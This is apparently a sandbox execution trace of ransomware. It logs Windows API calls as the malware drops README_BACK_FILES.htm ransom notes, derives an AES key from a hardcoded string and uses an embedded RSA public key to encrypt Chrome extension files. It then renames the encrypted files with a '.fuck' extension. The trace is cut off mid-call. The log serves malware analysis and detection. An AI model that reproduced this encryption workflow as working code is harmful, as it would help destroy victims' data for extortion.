GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\readme_back_files.htm")) returned 0xffffffff [0249.722] AreFileApisANSI () returned 1 [0249.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0249.722] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.723] GetFileType (hFile=0x5d54) returned 0x1 [0249.723] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.724] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0249.724] FindClose (in: hFindFile=0x29385b8 | out: hFindFile=0x29385b8) returned 1 [0249.724] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\readme_back_files.htm")) returned 0xffffffff [0249.725] AreFileApisANSI () returned 1 [0249.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 150 [0249.725] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0249.725] GetFileType (hFile=0x5d50) returned 0x1 [0249.726] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0249.727] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0249.727] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x29387f8 [0249.727] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.727] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.727] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0249.728] GetLastError () returned 0x0 [0249.728] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json")) returned 0x20 [0249.735] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json", dwFileAttributes=0x80) returned 1 [0249.736] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.736] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.738] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.gsg", dwFileAttributes=0x2) returned 1 [0249.739] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x293d678) returned 1 [0249.742] CryptCreateHash (in: hProv=0x293d678, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0249.742] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0249.742] CryptHashData (hHash=0x29385b8, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.742] CryptDeriveKey (in: hProv=0x293d678, Algid=0x6610, hBaseData=0x29385b8, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x29374f8) returned 1 [0249.742] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----f", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.742] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0249.742] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x293df80) returned 1 [0249.743] CryptImportPublicKeyInfo (in: hCryptProv=0x293df80, dwCertEncodingType=0x1, pInfo=0x2932ee0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932f10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932f18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2937738) returned 1 [0249.743] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0249.743] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293d3d0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x293d3d0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0249.743] WriteFile (in: hFile=0x5d58, lpBuffer=0x293d3d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x293d3d0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0249.744] ReadFile (in: hFile=0x5d54, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x160, lpOverlapped=0x0) returned 1 [0249.745] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x160, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x170) returned 1 [0249.745] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x170, lpOverlapped=0x0) returned 1 [0249.746] CloseHandle (hObject=0x5d54) returned 1 [0249.746] CloseHandle (hObject=0x5d58) returned 1 [0249.746] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), bFailIfExists=0) returned 1 [0249.750] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json", dwFileAttributes=0x0) returned 1 [0249.751] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.gsg")) returned 1 [0249.752] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.fuck")) returned 1 [0249.753] CryptDestroyHash (hHash=0x29385b8) returned 1 [0249.753] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.753] CryptReleaseContext (hProv=0x293d678, dwFlags=0x0) returned 1 [0249.753] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.753] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0249.757] GetLastError () returned 0x0 [0249.757] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json")) returned 0x20 [0249.757] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json", dwFileAttributes=0x80) returned 1 [0249.758] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.758] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.759] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.gsg", dwFileAttributes=0x2) returned 1 [0249.759] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x293d678) returned 1 [0249.762] CryptCreateHash (in: hProv=0x293d678, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0249.762] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0249.762] CryptHashData (hHash=0x2938978, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.762] CryptDeriveKey (in: hProv=0x293d678, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x29374f8) returned 1 [0249.762] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----f", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.762] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0249.762] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x2940318) returned 1 [0249.762] CryptImportPublicKeyInfo (in: hCryptProv=0x2940318, dwCertEncodingType=0x1, pInfo=0x2933080*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29330b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29330b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2938178) returned 1 [0249.762] CryptEncrypt (in: hKey=0x2938178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0249.763] CryptEncrypt (in: hKey=0x2938178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2940978*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x2940978*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0249.763] WriteFile (in: hFile=0x5d54, lpBuffer=0x2940978*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x2940978*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0249.764] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.774] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0249.775] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.793] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.793] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0249.793] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.794] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.794] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0249.794] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.794] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.794] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0249.794] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.794] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.794] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0249.794] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.794] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.795] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0249.795] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.795] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.795] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0249.795] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.795] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.795] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0249.795] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.795] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.795] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0249.795] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.795] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.795] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0249.796] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.796] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0249.796] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0249.796] WriteFile (in: hFile=0x5d54, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, 